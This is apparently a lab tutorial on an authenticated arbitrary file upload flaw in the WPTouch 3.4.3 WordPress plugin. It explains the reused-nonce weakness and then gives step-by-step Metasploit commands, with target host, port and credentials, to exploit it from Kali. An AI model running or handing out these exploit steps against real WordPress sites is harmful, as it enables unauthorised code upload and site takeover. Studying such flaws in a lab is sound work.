The WordPress WPTouch plugin contains an authenticated file upload vulnerability. A wp-nonce (CSRF token) is created on the backend index page and the same token is used on handling ajax file uploads through the plugin. By sending the captured nonce with the upload, we can upload arbitrary files to the upload folder. Because the plugin also uses its own file upload mechanism instead of the WordPress API, it’s possible to upload any file type. The user provided does not need special rights, and users with “Contributor” role can be abused.

 Exploit Targets

Wp touch 3.4.3

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_wptouch_file_upload

msf exploit (wp_wptouch_file_upload)>set targeturi /wordpress

msf exploit (wp_wptouch_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_wptouch_file_upload)>set username admin

msf exploit (wp_wptouch_file_upload)>set password admin123

msf exploit (wp_wptouch_file_upload)>set rport 80

msf exploit (wp_wptouch_file_upload)>exploit
